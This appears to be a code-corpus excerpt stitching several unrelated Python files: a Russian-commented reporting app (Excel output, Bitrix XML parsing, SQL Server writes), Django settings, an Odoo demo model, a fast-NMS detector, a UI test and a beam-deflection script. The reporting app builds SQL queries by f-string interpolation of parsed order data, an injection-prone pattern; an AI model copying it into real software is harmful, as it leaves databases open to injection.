ws.column_dimensions['A'].width = 1 / 7 * 124
ws.column_dimensions['B'].width = 1 / 7 * 21
ws.column_dimensions['C'].width = 1 / 7 * 95
ws.column_dimensions['D'].width = 1 / 7 * 24
ws.column_dimensions['E'].width = 1 / 7 * 80
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[1] + next_row()] = 'ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะทะฐ ะดะตะฝั'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
# ััะธััั
ws[column[1] + self.row].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws[column[1] + self.row].alignment = align_left
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[1].height = 24
ws[column[1] + next_row()] = f'{client_count_totals_org[0][0]}'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[2] + self.row] = client_count_totals_org[1][0].strftime("%d.%m.%Y")
ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=3)
ws[column[2] + self.row].font = font_bold
ws[column[2] + self.row].alignment = align_top
ws[column[4] + self.row] = 'ะฟะพ'
ws[column[4] + self.row].font = font
ws[column[4] + self.row].alignment = align_top
ws[column[5] + self.row] = (client_count_totals_org[-2][0]).strftime("%d.%m.%Y")
ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
ws[column[5] + self.row].font = font_bold
ws[column[5] + self.row].alignment = align_top
# ะขะะะะะฆะ
def merge_table():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=5)
ws[column[1] + self.row].font = font
ws[column[3] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[3] + self.row].alignment = align_top
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
def merge_table_bold():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=5)
ws[column[1] + self.row].font = font_bold
ws[column[3] + self.row].font = font_bold
ws[column[1] + self.row].alignment = align_top
ws[column[3] + self.row].alignment = align_top
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
ws[column[1] + next_row()] = 'ะะฐัะฐ'
ws[column[3] + self.row] = 'ะะพะปะธัะตััะฒะพ ะบะปะธะตะฝัะพะฒ'
merge_table_bold()
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for line in client_count_totals_org:
try:
ws[column[1] + next_row()] = line[0].strftime('%d.%m.%Y')
ws[column[3] + self.row] = line[1]
merge_table()
except AttributeError:
pass
ws[column[1] + next_row()] = 'ะัะพะณะพ'
ws[column[3] + self.row] = client_count_totals_org[-1][1]
merge_table_bold()
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
if client_count_totals_org[0][1]:
date_ = datetime.strftime(client_count_totals_org[1][0], "%Y-%m")
else:
date_ = f'{datetime.strftime(client_count_totals_org[1][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(client_count_totals_org[-2][0], "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + f' ะะพะปะธัะตััะฒะพ ะบะปะธะตะฝัะพะฒ ะทะฐ ะดะตะฝั ะฟะพ {client_count_totals_org[0][0]}' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะพััะตัะฐ ะฟะพ ะบะพะปะธัะตััะฒั ะบะปะธะตะฝัะพะฒ '
f'ะฟะพ {client_count_totals_org[0][0]} ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def parseXML(self, xmlString):
"""
ะงะขะะะะ XML ะก ะะะะะซะะ
:param xmlString: ัััะพะบะฐ XML ะธะท ะธะฝัะตัะฝะตั-ะผะฐะณะฐะทะธะฝะฐ ะะธััะธะบั
:return: ัะฟะธัะพะบ ัะปะพะฒะฐัะตะน ั ะดะฐะฝะฝัะผะธ
"""
x = re.search(r' encoding="windows-1251"', xmlString)
xml = xmlString[:x.start()] + xmlString[x.end():]
result = []
products_in_bay = -1
last_elem = ''
with open('xml_root.xml', 'w') as f:
f.write(xml)
root = objectify.fromstring(xml)
for doc in root.getchildren():
paydate = ''
pay = False
status = ''
for req in doc.ะะฝะฐัะตะฝะธัะ ะตะบะฒะธะทะธัะพะฒ.getchildren():
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะะฐัะฐ ะพะฟะปะฐัั':
paydate = datetime.strftime(datetime.strptime(str(req.ะะฝะฐัะตะฝะธะต), '%d.%m.%Y %H:%M:%S'),
'%Y-%m-%d %H:%M:%S')
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะะฐะบะฐะท ะพะฟะปะฐัะตะฝ':
pay = bool(req.ะะฝะฐัะตะฝะธะต)
if req.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต == 'ะกัะฐััั ะทะฐะบะฐะทะฐ':
status = str(req.ะะฝะฐัะตะฝะธะต)
for product in doc.ะขะพะฒะฐัั.getchildren():
count = int(product.ะะพะปะธัะตััะฒะพ)
while count > 0:
count -= 1
result.append(dict())
if last_elem != doc.ะะด:
products_in_bay = -1
last_elem = doc.ะะด
products_in_bay += 1
result[len(result) - 1]['Id_P'] = int(str(doc.ะะด) + str(products_in_bay))
result[len(result) - 1]['OrderNumber'] = int(doc.ะะด)
result[len(result) - 1]['ProductId'] = str(product.ะะด)
result[len(result) - 1]['ProductName'] = str(product.ะะฐะธะผะตะฝะพะฒะฐะฝะธะต)
result[len(result) - 1]['OrderDate'] = datetime.strptime(str(doc.ะะฐัะฐ + ' ' + doc.ะัะตะผั),
'%Y-%m-%d %H:%M:%S').strftime(
'%Y-%m-%d %H:%M:%S')
result[len(result) - 1]['PayDate'] = paydate
result[len(result) - 1]['Sum_P'] = Decimal(float(product.ะฆะตะฝะฐะะฐะะดะธะฝะธัั))
result[len(result) - 1]['Pay_P'] = pay
result[len(result) - 1]['Status_P'] = status
result[len(result) - 1]['Client_P'] = str(doc.ะะพะฝััะฐะณะตะฝัั.ะะพะฝััะฐะณะตะฝั.ะะด)
if result:
logging.info(
f'{datetime.strftime(datetime.now(), "%Y-%m-%d %H:%M:%S"):20}: '
f'ะะพะฒัะน ัะฐะนะป. ะะพะปะธัะตััะฒะพ ัััะพะบ - {len(result)}')
else:
logging.info(f'{datetime.strftime(datetime.now(), "%Y-%m-%d %H:%M:%S"):20}: ะะตั ะฝะพะฒัั
ะฟะพะบัะฟะพะบ.')
return result
def uploadToBase(self,
server,
database,
uid,
pwd,
Id_P,
OrderNumber_P,
ProductId_P,
ProductName_P,
OrderDate_P,
PayDate_P,
Sum_P,
Pay_P,
Status_P,
Client_P,
):
"""
ะัะฟัะฐะฒะบะฐ ะดะฐะฝะฝัั
ะฒ sql-ะฑะฐะทั
"""
driver = '{SQL Server}'
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
cursor = cnxn.cursor()
cursor.execute(f"""
INSERT INTO [Transactions](
[Id],
[OrderNumber],
[ProductId],
[ProductName],
[OrderDate],
[PayDate],
[Sum],
[Pay],
[Status],
[Client]
)
VALUES(
{Id_P},
{OrderNumber_P},
'{ProductId_P}',
'{ProductName_P}',
'{OrderDate_P}',
'{PayDate_P}',
{Sum_P},
{Pay_P},
'{Status_P}',
'{Client_P}'
)
""")
cnxn.commit()
return 'Upload To SQL-Base: Ready'
def if_in_base(self,
server,
database,
uid,
pwd,
Id_P,
):
driver = '{SQL Server}'
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
cursor = cnxn.cursor()
cursor.execute(f"""
SELECT
[Id],
[OrderNumber],
[ProductId],
[ProductName],
[OrderDate],
[PayDate],
[Sum],
[Pay],
[Status],
[Client]
FROM [Transactions]
WHERE
[Id] = {Id_P}
""")
result = []
while True:
row = cursor.fetchone()
if row:
result.append(row)
else:
break
if len(result) > 0:
return False
else:
return True
def load_checkbox(self):
"""
ะฃััะฐะฝะพะฒะบะฐ ัะตะบะฑะพะบัะพะฒ ะฒ ัะพะพัะฒะตัััะฒะธะธ ั ะฝะฐัััะพะนะบะฐะผะธ INI-ัะฐะนะปะฐ
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะฐะณััะทะบะฐ ะฝะฐัััะพะตะบ...')
self.root.ids.report.ids.split_by_days.active = self.split_by_days
self.root.ids.report.ids.finreport_xls.active = self.finreport_xls
self.root.ids.report.ids.check_client_count_total_xls.active = self.check_client_count_total_xls
self.root.ids.report.ids.check_cashreport_xls.active = self.check_cashreport_xls
self.root.ids.report.ids.check_itogreport_xls.active = self.check_itogreport_xls
self.root.ids.report.ids.agentreport_xls.active = self.agentreport_xls
self.root.ids.report.ids.use_yadisk.active = self.use_yadisk
self.root.ids.report.ids.finreport_google.active = self.finreport_google
self.root.ids.report.ids.finreport_telegram.active = self.finreport_telegram
def change_checkbox(self, name, checkbox):
"""
ะะทะผะตะฝัะตั ัะพััะพัะฝะธะต ัะปะตะผะตะฝัะฐ ะบะพะฝัะธะณััะฐัะธะธ ะธ ะทะฐะฟะธััะฒะฐะตั ะฒ INI-ัะฐะนะป
:param name: ะะผั ัะตะบะฑะพะบัะฐ
:param checkbox: ะกะพััะพัะฝะธะต active ัะตะบะฑะพะบัะฐ
"""
self.config.set('General', name, str(checkbox))
setattr(self, name, checkbox)
self.config.write()
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะฐัะฐะผะตัั {name} ะธะทะผะตะฝะตะฝ ะฝะฐ ะทะฝะฐัะตะฝะธะต {checkbox}')
if name == 'split_by_days' and not checkbox and not self.root.ids.report.ids.date_switch.active:
self.root.ids.report.ids.finreport_google.active = False
self.change_checkbox('finreport_google', False)
self.root.ids.report.ids.finreport_google.disabled = True
self.root.ids.report.ids.finreport_google_text.disabled = True
elif name == 'split_by_days' and checkbox:
self.root.ids.report.ids.finreport_google_text.disabled = False
self.root.ids.report.ids.finreport_google.disabled = False
def save_reports(self):
"""
ะคัะฝะบัะธั ัะฟัะฐะฒะปะตะฝะธั
"""
self.fin_report()
self.agent_report()
if self.finreport_xls:
self.path_list.append(self.export_fin_report())
if self.agentreport_xls:
self.path_list.append(self.export_agent_report(self.agentreport_dict))
if self.finreport_google:
self.fin_report_lastyear()
self.fin_report_beach()
if self.itog_report_month:
self.fin_report_month()
self.agent_report_month()
if self.export_to_google_sheet():
self.open_googlesheet()
if self.finreport_telegram:
self.sms_report_list.append(self.sms_report())
if self.check_itogreport_xls:
if self.itog_report_org1['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
self.path_list.append(self.save_organisation_total(self.itog_report_org1))
if self.itog_report_org2['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
self.path_list.append(self.save_organisation_total(self.itog_report_org2))
if self.itog_report_org3['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
self.path_list.append(self.save_organisation_total(self.itog_report_org3))
if self.check_cashreport_xls:
if self.cashdesk_report_org1['ะัะพะณะพ'][0][1]:
self.path_list.append(self.save_cashdesk_report(self.cashdesk_report_org1))
if self.cashdesk_report_org2['ะัะพะณะพ'][0][1]:
self.path_list.append(self.save_cashdesk_report(self.cashdesk_report_org2))
if self.check_client_count_total_xls:
if self.client_count_totals_org1[-1][1]:
self.path_list.append(self.save_client_count_totals(self.client_count_totals_org1))
if self.client_count_totals_org2[-1][1]:
self.path_list.append(self.save_client_count_totals(self.client_count_totals_org2))
def load_report(self):
"""
ะัะฟะพะปะฝะธัั ะพััะตัั
"""
self.itog_report_org1 = None
self.itog_report_org2 = None
self.itog_report_org3 = None
self.report_bitrix = None
self.click_select_org()
self.report_bitrix = self.read_bitrix_base(
server=self.server,
database=self.database_bitrix,
user=self.user,
pwd=self.pwd,
driver=self.driver,
date_from=self.date_from,
date_to=self.date_to,
)
self.report_bitrix_lastyear = self.read_bitrix_base(
server=self.server,
database=self.database_bitrix,
user=self.user,
pwd=self.pwd,
driver=self.driver,
date_from=self.date_from - relativedelta(years=1),
date_to=self.date_to - relativedelta(years=1),
)
self.report_rk = self.rk_report_request(
server=self.server_rk,
database=self.database_rk,
user=self.user_rk,
pwd=self.pwd_rk,
driver=self.driver,
cash_id=15033,
date_from=self.date_from,
date_to=self.date_to,
)
self.report_rk_lastyear = self.rk_report_request(
server=self.server_rk,
database=self.database_rk,
user=self.user_rk,
pwd=self.pwd_rk,
driver=self.driver,
cash_id=15033,
date_from=self.date_from - relativedelta(years=1),
date_to=self.date_to - relativedelta(years=1),
)
if self.org1:
self.itog_report_org1 = self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
org_name=self.org1[1],
date_from=self.date_from,
date_to=self.date_to,
hide_zeroes='0',
hide_internal='1',
)
self.itog_report_org1_lastyear = self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
org_name=self.org1[1],
date_from=self.date_from - relativedelta(years=1),
date_to=self.date_to - relativedelta(years=1),
hide_zeroes='0',
hide_internal='1',
)
self.itog_report_org3 = self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org3[0],
org_name=self.org3[1],
date_from=self.date_from,
date_to=self.date_to,
hide_zeroes='0',
hide_internal='1',
)
self.itog_report_org3_lastyear = self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org3[0],
org_name=self.org3[1],
date_from=self.date_from - relativedelta(years=1),
date_to=self.date_to - relativedelta(years=1),
hide_zeroes='0',
hide_internal='1',
)
if int((self.date_to - timedelta(1)).strftime('%y%m')) < int(self.date_to.strftime('%y%m')):
self.itog_report_month = self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
org_name=self.org1[1],
date_from=datetime.strptime('01' + (self.date_to - timedelta(1)).strftime('%m%y'), '%d%m%y'),
date_to=self.date_to,
hide_zeroes='0',
hide_internal='1',
)
self.report_rk_month = self.rk_report_request(
server=self.server_rk,
database=self.database_rk,
user=self.user_rk,
pwd=self.pwd_rk,
driver=self.driver,
cash_id=15033,
date_from=datetime.strptime('01' + (self.date_to - timedelta(1)).strftime('%m%y'), '%d%m%y'),
date_to=self.date_to,
)
else:
self.itog_report_month = None
self.cashdesk_report_org1 = self.cashdesk_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
date_from=self.date_from,
date_to=self.date_to,
)
self.client_count_totals_org1 = self.client_count_totals_period(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
org_name=self.org1[1],
date_from=self.date_from,
date_to=self.date_to,
)
if self.org2:
self.itog_report_org2 = self.itog_report(
server=self.server,
database=self.database2,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org2[0],
org_name=self.org2[1],
date_from=self.date_from,
date_to=self.date_to,
hide_zeroes='0',
hide_internal='1',
)
self.cashdesk_report_org2 = self.cashdesk_report(
server=self.server,
database=self.database2,
driver=self.driver,
user=self.user,
pwd=self.pwd,
date_from=self.date_from,
date_to=self.date_to,
)
self.client_count_totals_org2 = self.client_count_totals_period(
server=self.server,
database=self.database2,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org2[0],
org_name=self.org2[1],
date_from=self.date_from,
date_to=self.date_to,
)
# ะงัะตะฝะธะต XML ั ะฟัะธะฒัะทะบะพะน ะณััะฟะฟ ััะปัะณ ะบ ััะปัะณะฐะผ
self.orgs_dict = self.read_reportgroup(self.reportXML)
self.itogreport_group_dict = self.read_reportgroup(self.itogreportXML)
# ะะพะธัะบ ะฝะพะฒัั
ััะปัะณ
self.find_new_service(self.itog_report_org1, self.orgs_dict)
self.find_new_service(self.itog_report_org1_lastyear, self.orgs_dict)
self.find_new_service(self.itog_report_org3, self.orgs_dict)
self.find_new_service(self.itog_report_org3_lastyear, self.orgs_dict)
if self.itog_report_month:
self.find_new_service(self.itog_report_month, self.orgs_dict)
self.distibution_service()
def run_report(self):
self.open_browser = False
self.path_list = []
self.sms_report_list = []
if self.date_switch:
self.load_report()
else:
if self.split_by_days:
period = []
while True:
period.append(self.date_from)
if self.date_from + timedelta(1) == self.date_to:
break
else:
self.date_from = self.date_from + timedelta(1)
for date in period:
self.date_from = date
self.date_to = date + timedelta(1)
self.load_report()
self.date_from = datetime.strptime(self.root.ids.report.ids.date_from.text, "%Y-%m-%d")
else:
self.load_report()
# ะัะฟัะฐะฒะบะฐ ะฒ ัะฝะดะตะบั ะดะธัะบ
if self.use_yadisk:
self.path_list = filter(lambda x: x is not None, self.path_list)
self.sync_to_yadisk(self.path_list, self.yadisk_token)
self.path_list = []
# ะัะฟัะฐะฒะบะฐ ะฒ ัะตะปะตะณัะฐะผะผ
if self.finreport_telegram:
self.send_message_to_telegram()
self.sms_report_list = []
if __name__ == '__main__':
pass
| 50.719224 | 178 | 0.475653 |
ace8b2ffd3d6460d46122eebc7e89492370c0484 | 315 | py | Python | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 17 | 2019-05-11T22:15:34.000Z | 2022-03-26T22:45:33.000Z | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 390 | 2019-05-23T10:48:57.000Z | 2021-12-17T21:01:43.000Z | src/settings/components/frontend.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
] | 40 | 2019-05-21T14:41:57.000Z | 2021-01-30T13:39:38.000Z | """
Configs for the temporary frontend app
"""
from settings.components import config
RECAPTCHA_PUBLIC_KEY = config("RECAPTCHA_PUBLIC_KEY", default="")
RECAPTCHA_PRIVATE_KEY = config("RECAPTCHA_PRIVATE_KEY", default="")
GITHUB_JWT = config("GITHUB_JWT", default="")
GITHUB_REPO = config("GITHUB_REPO", default="")
| 31.5 | 67 | 0.771429 |
ace8b3640510abd33ada2d269cb829870c4f8d83 | 991 | py | Python | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 57 | 2020-06-22T05:28:11.000Z | 2022-03-25T08:15:08.000Z | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 2 | 2020-11-20T07:11:27.000Z | 2022-03-30T00:20:29.000Z | demo_multi_company/models/model.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 29 | 2020-07-04T15:24:01.000Z | 2022-03-28T01:29:03.000Z | from odoo import models, fields
import logging
_logger = logging.getLogger(__name__)
class DemoCompany(models.Model):
_name = 'demo.company'
_description = 'Demo Company'
name = fields.Char('Description', required=True)
property_account_receivable_id = fields.Many2one('account.account',
company_dependent=True,
string="Account Receivable",
domain="[('internal_type', '=', 'receivable'), ('deprecated', '=', False)]",
required=True)
company_id = fields.Many2one('res.company', string='Company', required=True, readonly=True, default=lambda self: self.env.user.company_id)
def action_get_default_account(self):
default_account = self.env['ir.property'].with_context(force_company=self.company_id.id).get('property_account_receivable_id', 'demo.company')
_logger.warning(default_account)
_logger.warning(self.property_account_receivable_id)
_logger.warning('============= HELLO ==================')
| 39.64 | 150 | 0.69223 |
ace8b37089649fd3f70e4d47c94442bf6bf7d72d | 5,320 | py | Python | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | src/opendr/perception/object_detection_2d/nms/fast_nms/fast_nms.py | daoran/opendr | bca25f6a43244fe9c219a24576181f94a0726923 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020-2022 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file contains code from the CIoU distribution (https://github.com/Zzh-tju/CIoU).
# Copyright (c) 2020 Zheng, Zhaohui.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from opendr.perception.object_detection_2d.nms.utils import NMSCustom
from opendr.perception.object_detection_2d.nms.utils.nms_utils import jaccard
from opendr.engine.target import BoundingBox, BoundingBoxList
import torch
import numpy as np
class FastNMS(NMSCustom):
def __init__(self, cross_class=False, device='cuda', iou_thres=0.45, top_k=400, post_k=100):
self.device = device
self.iou_thres = iou_thres
self.top_k = top_k
self.post_k = post_k
self.cross_class = cross_class
def set_iou_thres(self, iou_thres=0.45):
self.iou_thres = iou_thres
def top_k(self, top_k=400):
self.top_k = top_k
def post_k(self, post_k=100):
self.post_k = post_k
def set_cross_class(self, cross_class=False):
self.cross_class = cross_class
def run_nms(self, boxes=None, scores=None, threshold=0.2, img=None):
if isinstance(boxes, np.ndarray):
boxes = torch.tensor(boxes, device=self.device)
elif torch.is_tensor(boxes):
if self.device == 'cpu':
boxes = boxes.cpu()
elif self.device == 'cuda':
boxes = boxes.cuda()
if isinstance(scores, np.ndarray):
scores = torch.tensor(scores, device=self.device)
elif torch.is_tensor(scores):
if self.device == 'cpu':
scores = scores.cpu()
elif self.device == 'cuda':
scores = scores.cuda()
scores = torch.transpose(scores, dim0=1, dim1=0)
if self.cross_class:
[boxes, classes, scores] = cc_fast_nms(boxes=boxes, scores=scores, iou_thres=self.iou_thres,
top_k=self.top_k, post_k=self.post_k)
else:
[boxes, classes, scores] = fast_nms(boxes=boxes, scores=scores, iou_thres=self.iou_thres,
top_k=self.top_k, post_k=self.post_k)
keep_ids = torch.where(scores > threshold)
scores = scores[keep_ids].cpu().numpy()
classes = classes[keep_ids].cpu().numpy()
boxes = boxes[keep_ids].cpu().numpy()
bounding_boxes = BoundingBoxList([])
for idx, box in enumerate(boxes):
bbox = BoundingBox(left=box[0], top=box[1],
width=box[2] - box[0],
height=box[3] - box[1],
name=classes[idx],
score=scores[idx])
bounding_boxes.data.append(bbox)
return bounding_boxes, [boxes, classes, scores]
def fast_nms(boxes=None, scores=None, iou_thres=0.45, top_k=400, post_k=200):
scores, idx = scores.sort(1, descending=True)
boxes = boxes[idx, :]
scores = scores[:, :top_k]
boxes = boxes[:, :top_k]
num_classes, num_dets = scores.shape
boxes = boxes.view(num_classes, num_dets, 4)
iou = jaccard(boxes, boxes).triu_(diagonal=1)
iou_max, _ = iou.max(dim=1)
keep = (iou_max <= iou_thres)
keep *= (scores > 0.01)
classes = torch.arange(num_classes, device=boxes.device)[:, None].expand_as(keep)
classes = classes[keep]
boxes = boxes[keep]
scores = scores[keep]
scores, idx = scores.sort(0, descending=True)
idx = idx[:post_k]
scores = scores[:post_k]
classes = classes[idx]
boxes = boxes[idx]
return boxes, classes, scores
def cc_fast_nms(boxes=None, scores=None, iou_thres=0.45, top_k=400, post_k=200):
scores, classes = scores.max(dim=0)
_, idx = scores.sort(0, descending=True)
idx = idx[:top_k]
boxes = boxes[idx]
scores = scores[idx]
classes = classes[idx]
iou = jaccard(boxes, boxes).triu_(diagonal=1)
maxA, _ = torch.max(iou, dim=0)
idx_out = torch.where(maxA > iou_thres)
scores[idx_out] = 0
scores, idx = scores.sort(0, descending=True)
idx = idx[:post_k]
scores = scores[:post_k]
classes = classes[idx]
boxes = boxes[idx]
return boxes, classes, scores
| 35.945946 | 104 | 0.640977 |
ace8b39323ce54466593833d9c6eaec76e360820 | 909 | py | Python | tests/test_progressbar.py | Yardanico/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | 6 | 2017-10-16T03:23:05.000Z | 2020-11-10T06:24:04.000Z | tests/test_progressbar.py | TiberiumN/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | null | null | null | tests/test_progressbar.py | TiberiumN/pylibui-cffi | 10d90f08b6b1e43bf567ffcd22dbe976cb10e80e | [
"MIT"
] | 1 | 2018-09-07T06:14:27.000Z | 2018-09-07T06:14:27.000Z | """
Pylibui test suite.
"""
from pylibui.controls import ProgressBar
from tests.utils import WindowTestCase
class ProgressBarTest(WindowTestCase):
def setUp(self):
super().setUp()
self.progressbar = ProgressBar()
def test_value_initial_value(self):
"""Tests the progressbar's `value` initial value is zero."""
self.assertEqual(self.progressbar.value, 0)
def test_value_can_be_changed(self):
"""Tests the progressbar's `value` attribute can be changed."""
value = 30
self.progressbar.value = value
self.assertEqual(self.progressbar.value, value)
# TODO: should we check for variable type to avoid app crashes ?
# NOTE: weirdly enough, the sliders don't crash like this; this may
# be a bug in libui.
# with self.assertRaises(ValueError):
# self.progressbar.set_value('hello')
| 30.3 | 75 | 0.660066 |
ace8b5880f83efa2e6fd9910751cfa51c34d6209 | 4,630 | py | Python | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | 1 | 2020-03-31T11:54:28.000Z | 2020-03-31T11:54:28.000Z | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | null | null | null | Beam_Deformation.py | HeNeos/Mechanical | b64e9ea8610b4d8d8ef02d01d3ca7fea3ea7b857 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
n = 23
R2 = 5*(2*n*n + 1135*n + 110780)/(n+155)
R1 = 7340-60*n-R2
v = []
v.append(0)
for x in range(1,310+2*n+1):
aux = R1
if x>10:
aux = aux-(12-n)*(x-10)
if x>130+2*n:
aux = aux-(5000+10*n)
if x>80:
aux = aux + (12-n)*(x-80)
if x>260+2*n:
aux = aux+(50)*(x-(260+2*n)) + (5/12)*(x-(260+2*n))*(x-(260+2*n))
if x>200+2*n:
aux = aux-(5/12)*(x - (200+2*n))*(x - (200+2*n))
if x>=310+2*n:
aux = aux + R2
v.append(aux)
plt.figure(figsize=(9,4))
plt.xlabel('Longitud (mm)')
plt.ylabel('Fuerza cortante (N)')
plt.grid()
plt.plot(v,'-b')
plt.savefig('Fuerzacortante.pdf')
m = []
for x in range(0,310+2*n+1):
aux = R1*x
if x>10:
aux = aux-(12-n)*(x-10)*(x-10)/2
if x>130+2*n:
aux = aux-(5000+10*n)*(x-(130+2*n))
if x>80:
aux = aux + (12-n)*(x-80)*(x-80)/2
if x>260+2*n:
aux = aux+(25)*(x-(260+2*n))*(x-(260+2*n)) + (5/36)*(x-(260+2*n))*(x-(260+2*n))*(x-(260+2*n))
if x > 130+2*n:
aux = aux+(60000+200*n)
if x>200+2*n:
aux = aux-(5/36)*(x - (200+2*n))*(x - (200+2*n))*(x - (200+2*n))
if x>=310+2*n:
aux = aux + R2*(x-(310+2*n))
m.append(aux)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Momento flector (N-mm)')
plt.plot(m,'r')
plt.savefig('momento.pdf')
I = []
for i in range(0,310+2*n+1):
if i<10:
I.append((math.pi*(40)**4)/64)
continue
if i<80:
I.append((math.pi*(50)**4)/64)
continue
if i<200+2*n:
I.append((math.pi*(((50+((i-80)*20/(120+2*n))))**4)/64))
continue
if i<260+2*n:
I.append((math.pi*(70)**4)/64)
continue
if i<300+2*n:
I.append((math.pi*(60)**4)/64)
continue
I.append((math.pi*(55)**4)/64)
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('Momento de inercia (mm$^4$)')
plt.plot(I,'-m')
plt.savefig('momentoi.pdf')
E = 2.1*10**5
MEI = []
for i in range(0,310+2*n+1):
MEI.append(m[i]/(E*I[i]))
plt.figure(figsize=(9,4))
plt.grid()
plt.xlabel('Longitud (mm)')
plt.ylabel('M/EI (mm)')
plt.plot(MEI,'-b')
plt.savefig('mei.pdf')
mi = []
mi.append(0)
for i in range(1,310+2*n+1):
mi.append(m[i]/I[i] + mi[i-1])
plt.figure(figsize=(9,4))
plt.xlabel('Longitud (mm)')
plt.ylabel('$\int M/I$ (N/mm$^{2}$)')
plt.grid()
plt.plot(mi)
plt.savefig('mintegr.pdf')
